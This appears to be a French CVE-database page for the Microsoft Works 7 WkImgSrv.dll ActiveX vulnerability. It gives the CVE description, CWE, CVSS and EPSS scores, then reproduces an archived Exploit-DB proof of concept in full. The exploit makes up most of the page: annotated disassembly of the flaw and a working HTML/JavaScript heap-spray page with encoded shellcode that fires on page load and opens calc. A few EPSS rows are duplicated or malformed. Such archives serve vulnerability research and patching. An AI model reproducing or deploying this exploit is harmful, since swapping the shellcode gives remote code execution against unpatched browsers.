CPE, qui signifie Common Platform Enumeration, est un système normalisé de dénomination du matériel, des logiciels et des systèmes d'exploitation. CPE fournit un schéma de dénomination structuré pour identifier et classer de manière unique les systèmes informatiques, les plates-formes et les progiciels sur la base de certains attributs tels que le fournisseur, le nom du produit, la version, la mise à jour, l'édition et la langue.
CWE, ou Common Weakness Enumeration, est une liste complète et une catégorisation des faiblesses et des vulnérabilités des logiciels. Elle sert de langage commun pour décrire les faiblesses de sécurité des logiciels au niveau de l'architecture, de la conception, du code ou de la mise en œuvre, qui peuvent entraîner des vulnérabilités.
CAPEC, qui signifie Common Attack Pattern Enumeration and Classification (énumération et classification des schémas d'attaque communs), est une ressource complète, accessible au public, qui documente les schémas d'attaque communs utilisés par les adversaires dans les cyberattaques. Cette base de connaissances vise à comprendre et à articuler les vulnérabilités communes et les méthodes utilisées par les attaquants pour les exploiter.
Services & Prix
Aides & Infos
Recherche de CVE id, CWE id, CAPEC id, vendeur ou mots clés dans les CVE
A certain ActiveX control in WkImgSrv.dll 7.03.0616.0, as distributed in Microsoft Works 7 and Microsoft Office 2003 and 2007, allows remote attackers to execute arbitrary code or cause a denial of service (browser crash) via an invalid WksPictureInterface property value, which triggers an improper function call.
Improper Input Validation The product receives input or data, but it does
not validate or incorrectly validates that the input has the
properties that are required to process the data safely and
correctly.
Métriques
Métriques
Score
Gravité
CVSS Vecteur
Source
V2
9.3
AV:N/AC:M/Au:N/C:C/I:C/A:C
nvd@nist.gov
EPSS
EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.
Score EPSS
Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.
Date
EPSS V0
EPSS V1
EPSS V2 (> 2022-02-04)
EPSS V3 (> 2025-03-07)
EPSS V4 (> 2025-03-17)
2022-02-06
–
–
85.92%
–
–
2023-03-12
–
–
–
96.83%
–
2023-04-02
–
–
–
96.86%
–
2023-05-07
–
–
–
96.95%
–
2023-06-11
–
–
–
96.97%
–
2023-08-20
–
–
–
96.92%
–
2023-11-05
–
–
–
96.76%
–
2024-01-14
–
–
–
96.71%
–
2024-06-02
–
–
–
96.71%
–
2024-08-25
–
–
–
96.62%
–
2024-09-29
–
–
–
96.48%
–
2024-11-03
–
–
–
96.4%
–
2024-12-15
–
–
–
96.38%
–
2024-12-22
–
–
–
96.27%
–
2025-01-19
–
–
–
96.48%
–
2025-02-23
–
–
–
96.69%
–
2025-01-19
–
–
–
96.48%
–
2025-02-23
–
–
–
96.69%
–
2025-03-18
–
–
–
–
80.85%
2025-03-30
–
–
–
–
81.17%
2025-03-30
–
–
–
–
81.17,%
Percentile EPSS
Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
Date de publication : 2008-05-01 22h00 +00:00 Auteur : lhoang8500 EDB Vérifié : Yes
<!--
The problem is in wkimgsrv.dll module shipped with many MS Offiice
Suite (tested on MS OF 2003,MS OF 2007)
Actually,this is not the case of buffer overflow attack,just a exploit
of insecure method WKsPictureInterface.
Setting this point to any where in memory and IE will crash when
wkiimgsrv's trying to access an invalid memory location.
Let's get into detail :
00D473BD PUSH EBP ;
Begin of Set WksPictureInterface method
00D473BE MOV EBP,ESP
00D473C0 SUB ESP,1C
00D473C3 MOV EAX,DWORD PTR SS:[EBP+C] ; Move paramater to EAX
00D473C6 PUSH ESI
00D473C7 TEST EAX,EAX ; Checking whether
EAX is NULL
00D473C9 JNZ SHORT wkimgsrv.00D473D5 ; OK,if it is not null continue
00D473CB MOV EAX,80004005 ;
00D473D0 JMP wkimgsrv.00D47456 ;No,it's is NULL,exit method
00D473D5 ==> MOV ESI,DWORD PTR SS:[EBP+8] ; Do some other stuffs, we don't care
00D473D8 LEA EDX,DWORD PTR SS:[EBP-1C] ;
00D473DB PUSH EDX
00D473DC PUSH EAX
00D473DD MOV DWORD PTR DS:[ESI+2A0],EAX ; =============
00D473E3 ==> MOV ECX,DWORD PTR DS:[EAX] ; Here is the
problem,the data stored by EAX is referenced and moved into ECX
00D473E5 CALL DWORD PTR DS:[ECX+30] ;Next the address
in some struct pointed by ECX is called
Now if we're able to setup memory satisfied :
Create a struct in memory where the first DWORD in the struct point to
itself and the DWORD at offset 0x30 from struct address is point to
our shellcode.
We should be able to exploit this vulnerability.
This seem to be nightmare because there is nothing to inject except an
integer as paramater for the method.
Fortunately we have prefered heapspray method
Howerver we can't spray with nop (0x90 ) anymore(if this happens, all
address will be 90909090 which is invalid address) ,
The addresses and byte to spray must comply some restrictions
- Byte to spray must be single byte length instruction (or somewhat
that not change execution of the program or causing exception)
- Combination of 4 byte must refer to valid memory address which will
point to it self.
I have chosen 0x0A to spay on IE 7, and 0x05 to spay on IE 6. In
Internet Explorer 7 the number passes to method is 168430090 which is
0x0A0A0A0A in
hexa mode.Let's assume that we has fill 0x0A into memory at
0x0A0A0A0A. EAX will hold value of 0x0A0A0A0A.
Mov ECX,DWORD PTR DS:[EAX] ;=> ECX= 0x0A0A0A0A
CALL DWORD DTR DS:[ECX+30] ;=> CALL DWORD DTR:[0x0A0A0A3A] => CALL 0x0A0A0A0A
Memory at 0x0A0A0A0A is filled with 0x0A ~ instruction is OR CL,BYTE
PTR DS:[EDX]
Fortunately this hadn't caused exception and not changed execution
path of our shellcode
Shellcode should be executed as expected(calc will be opened).
-->
<html>
<head>
<title>Microsoft Works 7 WkImgSrv.dll Exploit</title>
Coded by lhoang8500
lhoang8500[at]gmail[dot]com
BKIS Center - Vietnam
<SCRIPT language="javascript">
var heapSprayToAddress = 0x0A0A0A0A;
var payLoadCode =
unescape("%u9090%u9090%u9090%u9090%u9090%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063");
var heapBlockSize = 0x400000;
var payLoadSize = payLoadCode.length * 2;
var spraySlideSize = heapBlockSize - (payLoadSize+0x38);
var spraySlide = unescape("%u0A0A%u0A0A");
spraySlide = getSpraySlide(spraySlide,spraySlideSize);
heapBlocks = (heapSprayToAddress - 0x400000)/heapBlockSize;
memory = new Array();
for (i=0;i<heapBlocks;i++)
{
memory[i] = spraySlide + payLoadCode;
}
function getSpraySlide(spraySlide, spraySlideSize)
{
while (spraySlide.length*2<spraySlideSize)
{
spraySlide += spraySlide;
}
spraySlide = spraySlide.substring(0,spraySlideSize/2);
return spraySlide;
}
</script>
<script language="JavaScript">
function payload() {
var num = 168430090;
obj.WksPictureInterface = num;
}
</script>
</head>
<body onload="JavaScript: return payload();">
<object classid="clsid:00E1DB59-6EFD-4CE7-8C0A-2DA3BCAAD9C6" id="obj">
</object>
</body>
</html>
# milw0rm.com [2008-05-02]